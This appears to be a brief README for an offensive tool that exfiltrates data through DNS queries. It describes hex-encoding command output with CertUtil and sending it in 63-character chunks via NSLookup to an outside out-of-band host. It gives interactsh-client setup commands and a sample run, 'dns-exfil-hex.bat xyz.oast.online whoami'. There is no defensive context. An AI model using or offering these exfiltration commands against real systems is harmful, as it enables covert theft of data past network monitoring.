Exfiltrate data with DNS queries in Hex. Based on CertUtil and NSLookup.
Command output will be encoded in Hex with CertUtil and exfiltrated in chunks up to 63 characters per query with NSLookup.
Download, unpack, give necessary permissions, and run the latest interact.sh client.
chmod +x interactsh-client
./interactsh-client -dns-only -json -o interactsh.json
Open the Command Prompt where you saved the batch script and run the following command:
dns-exfil-hex.bat xyz.oast.online whoami